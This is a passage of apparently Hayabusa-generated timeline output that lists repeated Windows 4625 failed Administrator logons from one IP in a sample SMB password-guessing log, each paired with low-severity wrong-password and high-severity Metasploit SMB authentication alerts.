Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.023 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: D6evoSSxcKkHspuc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.023 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.051 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: C4fznmrnIdUH7DzG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.051 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.099 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AwrrYjUV41P0K5Jh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.099 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.148 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: z4RBZrALEnH5BKP9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.148 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.192 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LU6uWH4gs4iHP7rV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.192 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.237 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hCfhZDAH8ufk77zN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.237 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.277 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TE9pw4UeRldGeKVc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.277 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.312 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Z8PKE05MqxE5TwXT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.312 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.357 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GIE5fmddOPBbCM3u : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.357 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.414 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Pveyo4Czx6KWKCGn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.414 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.453 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zPyyHaRnBec7Qg2x : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.453 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.486 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: V3b8mudJp5mdkiEW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.486 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.524 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7Y6mjLaCzR28Q2qK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.524 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.563 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dMsNKWEjeCYYQVqw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.563 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.605 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I7c5fENhkwO6QfEU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.605 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.648 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Cr1wAeMhPgVpwV82 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.648 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.692 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fErpp9Ww6LO37C9k : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.692 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.728 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CYsNpBsGT5zOKe3p : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.728 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.866 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sgzUk1Dmttm4AQ3s : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.866 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.921 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Hp0c3YYyOSJuBHCR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.921 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.965 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gkis4H1MIQPHUwqf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.965 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.009 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Lb6mH03qKLb8O7Dz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.009 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.051 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: J10xEmhRNWfJ5FCI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.051 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.093 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5Dujj8A7wwzAwzCp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.093 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.128 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NVDE3fIoUQfLn3cd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.128 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.175 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UlD48O0XpFUnuSmo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.175 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.213 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KyTPKuspADmLpv0L : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.213 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.260 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BdIAPiH32ZbmCgTK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.260 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.292 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1dEiN2xOA4E9Wl5p : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.292 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.337 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fBeAez2fLjXB0dk3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.337 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.372 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gQ45aeMDc3Snabvv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.372 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.420 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QWSYdr4lJlhCLMMW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.420 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.462 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RgxHY7072aUCdfa0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.462 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.504 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9yKhEodJDTVCGdIG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.504 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.597 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Z0odyPQmvkGRNWZF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.597 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.630 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: b5uRpG0fxCK75DPV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.630 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.666 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: d9dcEzpJRW5YA8Bj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.666 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.712 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Hv3B9bwB1YIaBa6N : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.712 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.743 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lJf9Obml4aVxE5zp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.743 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.776 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mvnSOaRSkGU6Uf5q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.776 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.808 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JSAkZsZsv0SaLKaO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.808 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.847 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: r6rnM6QbwfbbrcGy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.847 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.888 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RX0GW7K5wdQJUx4Y : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.888 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.920 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Xm7CpD5i735McsvS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.920 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.959 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bHxjZsnR25J47Ez8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.959 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.999 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: J1JWj91m79FyykH6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.999 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.043 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: h9i0GncOzpz5REWp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.043 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB 